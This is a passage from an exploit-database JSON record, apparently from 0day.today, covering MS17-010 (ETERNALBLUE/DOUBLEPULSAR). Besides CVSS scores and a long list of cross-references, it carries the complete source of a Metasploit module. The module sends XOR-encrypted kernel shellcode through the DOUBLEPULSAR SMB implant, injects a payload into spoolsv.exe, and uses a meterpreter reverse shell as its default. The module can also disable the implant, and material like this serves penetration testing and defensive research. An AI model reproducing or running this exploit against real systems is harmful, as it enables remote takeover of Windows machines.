"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-22T22:15:46", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27802"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:42030"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-22T22:15:46", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-22T22:15:46", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-23] #"}, "lastseen": "2021-09-22T22:15:46", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "66d4f60e99160e541ccc5f95301164ff", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-23T22:16:05", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", 